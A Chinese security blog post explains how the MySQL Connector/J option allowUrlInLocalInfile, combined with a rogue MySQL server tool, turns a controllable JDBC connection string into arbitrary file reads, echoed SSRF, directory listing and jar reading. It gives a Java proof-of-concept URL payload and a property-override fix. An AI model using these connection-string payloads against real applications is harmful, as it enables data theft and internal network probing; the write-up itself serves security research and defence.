MySQL JDBC Connector的allowUrlInLocalInfile选项利用

最新推荐文章于 2023-09-22 14:42:56 发布
最新推荐文章于 2023-09-22 14:42:56 发布
阅读量1w 收藏 1
点赞数
分类专栏: Java 安全 文章标签: mysql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fnmsd/article/details/117436182
版权
安全 同时被 2 个专栏收录
22 篇文章 2 订阅
订阅专栏
Java
18 篇文章 3 订阅
订阅专栏

前言

allowUrlInLocalInfile非默认开启项,场景有限。

JDBC连接串可控,但没法利用反序列化的时候可以试试。

只能读文件的时候也可以试试,万一开了呢。

有关MySQL Fake Server

https://github.com/fnmsd/MySQL_Fake_Server

基于https://github.com/waldiTM/python-mysqlproto项目修改而来。

用于安全测试过程中MySQL客户端任意文件读取及Java反序列化的利用。

6月1日增加了大文件读取的支持,可读取二进制文件,可自动保存文件,目前测试中最大读了50MB的ysoserial,MD5不变,可正常使用。

其他的内容看项目的更新日志吧。

正文

改MySQL Fake Server的时候发现,MySQL JDBC Connector的com.mysql.cj.protocol.a.sendFileToServer方法中,存在一个对allowUrlInLocalInfile属性的判断,如果为true,那么就会使用URL类来加载我们提供的路径,这时候就可以使用其他URL类支持的协议了。

在这里插入图片描述
在文档https://dev.mysql.com/doc/connector-j/8.0/en/connector-j-connp-props-security.html中可以看到,从3.1.4开始就支持这个选项了,不过默认是false。

jdk1.8u20下URL支持协议:http/https/ftp/file/jar/mailto/netdoc(可在sun.net.www.protocol中看到)

所以在可控连接串的情况下,除了读取本地文件、反序列化,还可以将其当做有回显的GET型SSRF使用、列目录使用。

import java.sql.Connection;
import java.sql.Driver;
import java.sql.DriverManager;
import java.util.Properties;

public class test1 {
    public static void main(String[] args) throws Exception{

        String driver = "com.mysql.jdbc.Driver";
        String DB_URL = "jdbc:mysql://127.0.0.1:3306/test?user=fileread_http://www.baidu.com&allowUrlInLocalInfile=true";
        Class.forName(driver);
        Connection conn = DriverManager.getConnection(DB_URL);

    }
}

效果如下:

访问https://www.baidu.com,可以获取到回显内容
在这里插入图片描述
访问http://127.0.01:8083时,可正常收到请求
在这里插入图片描述
可以使用file协议列目录:
在这里插入图片描述
使用jar协议读取jar包中的内容:
在这里插入图片描述

有关修复

原生的场景下可以使用预先定义的Properties将URL中的属性覆盖掉,就可以关闭本地文件读取以及URL读取了。

String driver = "com.mysql.jdbc.Driver";
String DB_URL = "jdbc:mysql://127.0.0.1:3306/test?user=fileread_c:/windows/system32/cmd.exe&maxAllowedPacket=111111&allowLoadLocalInfile=true";
Class.forName(driver);
Properties properties = new Properties();
properties.setProperty("allowLoadLocalInfile","false");
properties.setProperty("allowUrlInLocalInfile","false");
Connection conn = DriverManager.getConnection(DB_URL,properties);

结尾

emmmmm

fnmsd
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql load data 一行_JDBC使用MYSQL的LOAD DATA LOACAL INFILE和LOAD DATA INFILE
weixin_39948111的博客
01-26 381
MYSQL的LOAD方法都必须建立在mysql服务允许使用该命令的情况下:开启该命令的方法:1、在实例对应的my.cnf(windows为my.ini)中添加一行local-infile=1(默认好像是开启的),改为0即关闭,LOAD方式禁用。2、加参数local-infile=1(默认是开启的,除非my.cnf中配置了禁止使用load才这样启动)启动mysql,"/usr/local/mysql...
Jdbc Mysql常用连接url,解决常见问题(解决远程Load data infile问题)
qq_18453581的博客
05-30 1906
最直接用dos命令 mysql -u用户名 -p密码 数据库 -P端口 -h主机 --local-infile=1 -e "LOAD DATA LOCAL INFILE 'c:/test.txt' INTO TABLE 表名 FIELDS TERMINATED BY '\t' ENCLOSED BY '\t';" jdbc:mysql://ip:port/数据库名称?useUnico...
MySQL load data local infile踩坑
yz_yz1234的博客
04-08 4456
问题描述 在我写从hdfs转储数据到mysql的过程中,使用jdbc调用LOAD DATA local infile命令批量插入时一直会出现 The used command is not allowed with this MySQL version 我使用的是mysql8,因为这方面经验不足,走了不少弯路,小记一下,留存。 在mysql8中,local infile是默认关闭的,我查了...
Mysql JDBC Driver参数配置
zcyiysj的博客
02-08 3433
Mysql JDBC Driver参数配置
mysql故障切换 java_java.sql.SQLException: Value'0000-00-00'异常解决办法及mysqlurl设置...
weixin_39563827的博客
01-21 523
一、0000-00-00错误及解决方案:在使用MySql 时, 数据库中的字段类型是timestamp的,默认为0000-00-00, 会发生异常:java.sql.SQLException: Value '0000-00-00 ' can not be represented as java.sql.Timestamp解决办法:给jdbc url加上 ze...
mysql-connector-cj-8.0.32.jar JDBC驱动 解压即用
03-09
mysql-connector-j 是 MySQL 官方提供的一个 JDBC 驱动,用于在 Java 应用程序中连接和操作 MySQL 数据库。它是开源的,使用它可以方便地在 Java 代码中操作 MySQL 数据库mysql-connector-j 以 jar 包的形式提供,...
mysql-connector-java-8.0.27.jar
12-18
MySQL Connector/J是MySQL数据库与Java应用程序之间的桥梁,它是一个实现了JDBC(Java Database Connectivity)标准的驱动程序,允许Java开发者在Java应用中访问和操作MySQL数据库。`mysql-connector-java-8.0.27....
mysql-connector-java-8.0.26.jar
12-18
MySQL Connector/J 8.0.26 是MySQL数据库与Java应用程序之间的重要桥梁,它是一个实现了JDBC(Java Database Connectivity)规范的驱动程序,允许Java开发者在应用中无缝地连接到MySQL数据库进行数据操作。...
最新版 JDBC,版本号为mysql-connector-java-8.0.16
03-20
最新版的JDBC驱动程序,即mysql-connector-java-8.0.16,是MySQL官方提供的用于连接Java应用程序到MySQL数据库的工具。这个版本的驱动程序支持最新的MySQL特性,并且在性能和稳定性上都有所提升。 在Java中,使用...
mysql-connector-java-8.0.23.jar
最新发布
12-18
MySQL Connector/J 8.0.23 是MySQL数据库与Java应用程序之间的重要桥梁,它是一个用于连接Java应用程序到MySQL服务器的JDBC驱动程序。这个jar文件是MySQL官方提供的,确保了与MySQL数据库的高效且可靠的通信。在Java...
Mysql allowLoadLocalInfil 参数漏洞分析
编码行者的博客
01-06 2146
收到这个漏洞首先,第一时间去官网,官网说这个参数3.03版本就修复了。默认false值。想当然的认为没问题,分析版本一大波操作下来,最后看源码默认值true,坑爹的官网有错误,坑死老夫了,果断跟官网反映 allowLoadLocalInfile Should the driver allow use of “LOAD DATA LOCAL INFILE …”? Setting to “true” overrides whatever path is set in ‘allowLoadLocalInfile
String index out of range: -1
热门推荐
疯猫
08-18 8万+
      前两天报字符串越界,查找中发现,应该是取某一个字符的位置时,出错了,原来使用lastIndexOf时要取得这个字符在被查找的字符串里没有。解决方法,在取位置之前,先要验证一下,字符是否存在。 if(name.lastIndexOf("Form")!=-1){       name = name.substring(0, name.lastIndexOf("Form"));
MySQL进阶教程】SQL优化
m0_55799410的博客
02-08 253
MySQL进阶教程】SQL优化
MySQL修改my.ini文件失效
TLY820的博客
06-17 972
本机电脑先后安装了5.5,5.7,8.0三个版本 在cmd中为了解决乱码问题,修改了当前使用的5.7版本的my.ini 设置default-character-set=gbk 结果没有作用 问题在于环境变量中 5.5在5.7之前 解决办法:将5.7的路径上移,结果成功 ...
Python MySQL利用load data infile加载大文件入表
自在飞花轻似梦,无边丝雨细如愁!
12-16 2815
有时候我们需要将大量数据批量写入数据库,直接使用程序语言和Sql写入往往很耗时间,其中有一种方案就是使用MySql Load data infile导入文件的形式导入数据,这样可大大缩短数据导入时间。 假如是从MySql客户端调用,将客户端的文件导入,则需要使用 load local data infile. LOAD DATA INFILE 语句以很高的速度从一个文本文件中读取行到一个表中。文件名必须是一个文字字符串。 1,开启load local data infile. 假如是Linux下编译安装.
mysql 批量插入BulkCopy
码农的专栏
02-28 1141
二、连接串未添加AllowLoadLocalInfile=true。一、新建项目:SqlSugarDemo。三、Startup.cs。
C# mysql导入文件报错:The used command is not allowed with this MySQL version
mao_mao37的博客
08-02 2639
环境:c# ,mysql.data ,visual studio2017 问题:向mysql导入本地文件时,提示错误 错误信息:The used command is not allowed with this MySQL version 原因:在mysql.data升级之后,为了安全考虑,默认不允许加载本地文件数据 解决方案: 1.在mysql连接命令后设置AllowLoadLocal...
JDBC MySQL任意文件读取分析
stopys6的博客
09-22 374
文章首发于知识星球-赛博回忆录。给主管打个广告,嘿嘿。在渗透测试中,有些发起mysql测试流程(或者说mysql探针)的地方,可能会存在漏洞。在连接测试的时候通过添加allowLoadLocalInfileInPath,allowLoadLocalInfile,allowUrlInLocalInfile与伪造的服务器进行通信,造成任意文件读取。完整payload:test?以下是可以利用该漏洞的一些场景。
MysqlJDBC 的常见连接属性
09-08 4117
<br /> 在JDBC中,Connection类的创建方式有三种函数(不包括连接池),<br />一是:DriverManager.getConnection(String url),<br />二是:DriverManager.getConnection(String url,String user,String password);<br />三是:DriverManager.getConnection(String url,Properties info);<br /><br />MySQL的JDB
mysql jdbc
08-24
MySQL JDBC是一种用于连接和操作MySQL数据库的Java数据库连接API。它提供了一组类和方法,使Java应用程序能够与MySQL数据库进行通信。 开发人员可以使用MySQL JDBC驱动程序来连接到MySQL数据库,并执行各种操作,如执行SQL查询、更新和删除数据等。它还支持事务处理、连接池和预编译语句等功能。 以下是一个简单的代码示例,演示如何使用MySQL JDBC连接到数据库并执行查询操作: ```java import java.sql.*; public class MySQLJDBCExample { public static void main(String[] args) { String url = "jdbc:mysql://localhost:3306/mydatabase"; String username = "root"; String password = "password"; try (Connection connection = DriverManager.getConnection(url, username, password)) { String sql = "SELECT * FROM users"; Statement statement = connection.createStatement(); ResultSet resultSet = statement.executeQuery(sql); while (resultSet.next()) { int id = resultSet.getInt("id"); String name = resultSet.getString("name"); String email = resultSet.getString("email"); System.out.println("ID: " + id + ", Name: " + name + ", Email: " + email); } } catch (SQLException e) { e.printStackTrace(); } } } ``` 在上面的示例中,我们首先指定了MySQL数据库URL、用户名和密码。然后,我们使用`DriverManager.getConnection()`方法获取数据库连接。接下来,我们创建一个`Statement`对象,并使用它执行SQL查询。最后,我们通过`ResultSet`对象遍历查询结果,并将结果打印到控制台上。 这只是一个简单的示例,MySQL JDBC API还提供了很多其他功能和方法,可以根据具体的需求进行使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值